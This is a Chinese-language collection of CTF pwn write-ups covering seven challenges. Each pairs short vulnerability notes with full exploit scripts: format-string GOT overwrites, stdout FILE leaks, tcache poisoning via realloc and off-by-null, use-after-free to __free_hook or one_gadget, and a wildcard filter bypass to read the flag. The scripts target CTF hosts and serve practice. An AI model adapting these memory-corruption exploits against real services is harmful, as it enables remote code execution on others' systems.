一些题目练习。
picoctf_2018_echo back
32位格式化字符串,可写got表。fmtstr_payload写puts@got为vuln、printf@got为system@plt一把梭
from pwncy import *
context(log_level = "debug",arch = "i386")
filename = "PicoCTF_2018_echo_back"
remote_libc = "/home/tw0/Desktop/tool/buu_libc/x86/libc-2.27.so"
ip_port = "node4.buuoj.cn:28340"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
debug(p,'no-tmux',0x08048604)
# writes = {elf.got.puts:elf.plt.system,0x08048739:b"sh"}
writes = {elf.got.puts:elf.sym.vuln,elf.got.printf:elf.plt.system}
fmt = fmtstr_payload(7,writes = writes, numbwritten=0, write_size="byte")
sla("input your message:\n",fmt)
pause()
sl("/bin/sh\x00")
itr()
inndy_echo2
同样64位格式化字符串,got可写,开pie。先leak elf地址,再改printf@got为system@plt。
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "echo2"
remote_libc = "/home/tw0/Desktop/tool/buu_libc/x64/libc-2.23.so"
ip_port = "node4.buuoj.cn:26104"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
debug(p,'no-tmux','pie',0x0000000000000984)
# writes = {elf.got.puts:elf.plt.system,0x08048739:b"sh"}
sl("%41$p")
elf_base = int(r(len("0x555555400a03")),16) - elf.sym.main -74
log_addr("elf_base")
writes = {(elf_base + elf.got.printf):(elf_base + elf.plt.system),}
fmt = fmtstr_payload(6,writes = writes, numbwritten=0, write_size="byte")
sl(fmt)
pause()
sl("/bin/sh\x00")
itr()
npuctf_2020_level2
非栈上格式化字符串。打法很简单,就是要注意下接受函数,让程序输出输入有时间。就像exp中接受的'\xb4'字符,可以观察程序输出内容,进行修改接受。
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "npuctf_2020_level2"
remote_libc = "/home/tw0/Desktop/tool/buu_libc/x64/libc-2.27.so"
ip_port = "node4.buuoj.cn:28408"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
# 9, 35
exit = b"66666666\x00"
debug(p,'no-tmux','pie',0x000000000000081F)
sl(b"%6$p.%7$p.%9$p")
elf_base = int(r(len("0x555555400830")),16) - elf.sym.__libc_csu_init
log_addr("elf_base")
ru(".")
libc.address = int(r(len("0x555555400830")),16) - 231 - libc.sym.__libc_start_main
log("libc.address",hex(libc.address))
ru(".")
stack_addr = int(r(len("0x555555400830")),16) - 0xe0
log_addr("stack_addr")
ogg = search_og(1) + libc.address
log_addr("ogg")
pause()
fmt = bytes("%{}c%9$hn\x00".format((stack_addr & 0xffff)),encoding = 'utf-8')
sl(fmt + b"\x00")
fmt = bytes("%{}c%35$hhn\x00".format((ogg & 0xff)),encoding = 'utf-8')
sla("\xb4",fmt + b"\x00")
fmt = bytes("%{}c%9$hhn\x00".format((stack_addr & 0xff) + 1),encoding = 'utf-8')
sla("\xb4",fmt + b"\x00")
fmt = bytes("%{}c%35$hhn\x00".format(((ogg >> 8) & 0xff)),encoding = 'utf-8')
sla("\xb4",fmt + b"\x00")
fmt = bytes("%{}c%9$hhn\x00".format((stack_addr & 0xff) + 2),encoding = 'utf-8')
sla("\xb4",fmt + b"\x00")
fmt = bytes("%{}c%35$hhn\x00".format(((ogg >> 16) & 0xff)),encoding = 'utf-8')
sla("\xb4",fmt + b"\x00")
s(exit)
itr()
roarctf_2019_realloc_magic
写点有营养的wp。良心菜单题,保护全开,符号全没去。
用realloc函数申请chunk。这里要注意realloc申请的规则。
- 申请size小于等于原ptr的size,直接返回原ptr
- 申请size大于原ptr的size,会先检查nextchunk有无inuse,没有inuse进行unlink合并,然后重新malloc。如果没有可用mem就重新开一段地址并复制内容到新开辟chunk中
- 申请size为0时相当于free并清空指针
删除函数有UAF。
隐藏666函数,清空realloc_ptr指针。
问题:
- 程序没有leak函数,无法获得libc的地址。
- 如果用io leak方法,那么怎么将chunk放入unsortedbin中?如果是大于tcache大小的chunk被释放后会因为和top chunk相连直接合并。
- 存在UAF漏洞,可以使用tcache attack。但是似乎无法制造chunk overlap实现tcache posioning。
解决方案:
- 可以利用io leak方法,踩main arena残留地址为stdout结构体,泄露libc地址
- UAF释放7次填满tcache idx后将chunk放入unsorted bin中
- 查看realloc函数源码,发现realloc函数在有ptr指针时,如果next chunk 是没有inuse的就会进行合并再分割,从而实现chunk overlap
exp打远程时需要修改脚本进行爆破,或者重写新py用os执行下面的脚本
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "roarctf_2019_realloc_magic"
remote_libc = "/home/tw0/Desktop/tool/buu_libc/x64/libc-2.27.so"
ip_port = "node4.buuoj.cn:26091"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
def cmd(choice):
sla(">> ",str(choice))
def add(size,content):
cmd(1)
sla("Size?\n",str(size))
sa("Content?",content)
def delete():
cmd(2)
def attack():
debug(p,'no-tmux','pie',0x0000000000000A8A)
pad = b"dead"
null = b""
add(0x40,pad)
add(0,null)
add(0x80,pad)
add(0,null)
add(0x50,pad)
add(0,null)
add(0x80,pad)
for i in range(7): #释放7次填满tcache
delete()
add(0,null) #进入unsorted bin中,标记next chunk的previnuse位
add(0x40,pad)
add(0x60,b"a" * 0x48 + p64(0x51) + p16(libc.sym._IO_2_1_stdout_ & 0xffff))
add(0,null)
add(0x80,pad)
add(0,null)
# pause()
add(0x80,p64(0xfbad1887) + p64(0) * 3 + p8(0xc8))
stdin_addr = recv_libc()
log_addr("stdin_addr")
libc.address = stdin_addr - libc.sym._IO_2_1_stdin_
log("libc.address",hex(libc.address))
free_hook = libc.sym.__free_hook
system = libc.sym.system
cmd(666)
# pause()
add(0x20,pad)
add(0,null)
add(0x90,pad)
add(0,null)
add(0x30,pad)
add(0,null)
add(0x90,pad)
# pause()
for i in range(7):
delete()
add(0,null)
add(0x20,pad)
add(0x40,b"a" * 0x20 + p64(0) + p64(0x51) + p64(free_hook - 8))
add(0,null)
pause()
add(0x90,pad)
add(0,null)
pause()
add(0x90,b"/bin/sh\x00" + p64(system))
pause()
delete()
itr()
attack()
ciscn_2019_s_1
got表不可写,edit存在offbynull漏洞,glibc-2.27版本,可以利用house of botcacke手法打tcache posioning。有show函数,但是需要先写key位置。
from pwncy import *
context(log_level = "debug",arch = "i386")
filename = "ciscn_s_1"
remote_libc = "/home/tw0/Desktop/tool/buu_libc/x64/libc-2.27.so"
ip_port = "node4.buuoj.cn:25467"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
def cmd(choice):
sla("4.show\n",str(choice))
def add(index,size,content):
cmd(1)
sla("index:\n",str(index))
sla("size:\n",str(size))
ru("gift: ")
heap_addr = int(ru("\n"),16)
sa("content:\n",content)
return heap_addr
def delete(index):
cmd(2)
sla("index:\n",str(index))
def change(index,content):
cmd(3)
sla("index:\n",str(index))
sa("content:\n",content)
def show(index):
cmd(4)
sla("index:\n",str(index))
debug(p,'no-tmux',0x400B8A)
pad = b"dead"
key2 = 0x00000000006022B8
key1 = 0x00000000006022BC
for i in range(7): #0-6
add(i,0x88,pad)
add(7,0x88,pad)
add(8,0xe8,pad) #posion 1
add(9,0xa8,pad) #posion 2
add(10,0xf8,pad)
add(11,0x80,pad)
for i in range(7):
delete(i)
for i in range(7):
add(i,0xf8,pad)
for i in range(7):
delete(i)
delete(7)
change(9,b"a" * 0xa0 + p64(0x230))
delete(10)
delete(8)
add(7,0xa0,b"a" * 0x80 + p64(0) + p64(0xa1) + p64(key2)) #7 posion 1
# pause()
add(8,0xe8,pad)
add(10,0xe8,p64(0xffffffffffffffff))
for i in range(7):
add(i,0xf0,pad)
add(12,0xf0,b"a" * 0x8)
show(12)
# pause()
ru(b"a" * 0x8)
libc.address = recv_libc() - 96 - libc.sym.__malloc_hook - 0x10
log("libc.address",hex(libc.address))
free_hook = libc.sym.__free_hook
system = libc.sym.system
delete(9)
change(12,b"a" * 0xc0 + p64(0) + p64(0xb1) + p64(free_hook - 8))
# pause()
add(13,0xa0,pad)
add(14,0xa0,b"/bin/sh\x00" + p64(system))
delete(14)
itr()
另外,因为heap[31] 0x6021e0和key 0x6022B8地址相差0xd8,加上unlink之后的0x18,刚好0xf,可以unlink之后直接写key,需要对数据敏感一些。
uaf
如题目描述,存在uaf漏洞。利用uaf漏洞打tcache bin attack。
直接附上exp。
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "main"
remote_libc = "./libc-2.31.so"
ip_port = "120.78.172.238:42687"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
def cmd(choice):
# pass
sla(">> \n",str(choice))
def add(size,content):
cmd(1)
sla("Tell me the book content size: \n",str(size))
sa("Tell me the book content: \n",content)
def delete(index):
cmd(2)
sla("Tell me the book index: \n",str(index))
def change(index,content):
cmd(3)
sla("Tell me the book index: \n",str(index))
sla("Tell me the book content: \n",content)
def show():
cmd(4)
def login(password = b"1234567890"):
cmd(5)
sa("Passwd: \n",password)
def hack(name,ptr,address,mode = 2):
sla("Tell me ur name: \n",name) #8 bytes #$p$19$p
sla(">> \n",mode)
sa("READ MODE: \n",ptr)
s(address)
debug(p,'no-tmux','pie',0x1386,0x1429)
add(0x500,b"A")
add(0x500,b"b")
delete(0)
show()
main_arena = recv_libc()
libc_base = main_arena - 96 - 0x10 - libc.sym.__malloc_hook
libc.address = libc_base
free_hook = libc.sym.__free_hook
add(0x10,b"aaaaaaaaaaaaaaaa") #2
show()
ru("aaaaaaaaaaaaaaaa")
heap1 = u64(r(6).ljust(8,b"\x00"))
log_addr("heap1")
heap_base = heap1 - 0x290
add(0x10,b"A" * 0x10) #3
delete(3)
delete(0)
pause()
change(2,flat([p64(free_hook),p64(heap_base + 0x10)]))
pause()
add(0x10,b"b")
add(0x10,b'c') #5
change(5,flat([p64(libc_base + search_og(1))]))
delete(0)
itr()
admin
此处仅讲正向思路:反编译获得题目菜单选项,首先查看第五个选项cmd。
查看cmd选项逻辑,最多可以输入0x100字节的command存储在数组buf中。程序会对buf数组中的字符进行每两个检查sh
、每四个检查flag
,如果没有这两个字符存在,就执行命令。因此可以利用通配符代替flag字符获得flag。
操作过程可以写脚本执行,直接打会更加方便。
from pwncy import *
context(log_level = "debug",arch = "amd64")
filename = "./main"
remote_libc = "./libc-2.31.so"
ip_port = "39.108.165.189:41548"
p,elf,libc = load(filename,remote_libc = remote_libc,ip_port = ip_port)
def cmd(choice):
sla(">> \n",str(choice))
debug(p,'no-tmux','pie',0x1D84)
cmd(5)
command = b"cat fla*"
sla("Command: \n",command)
itr()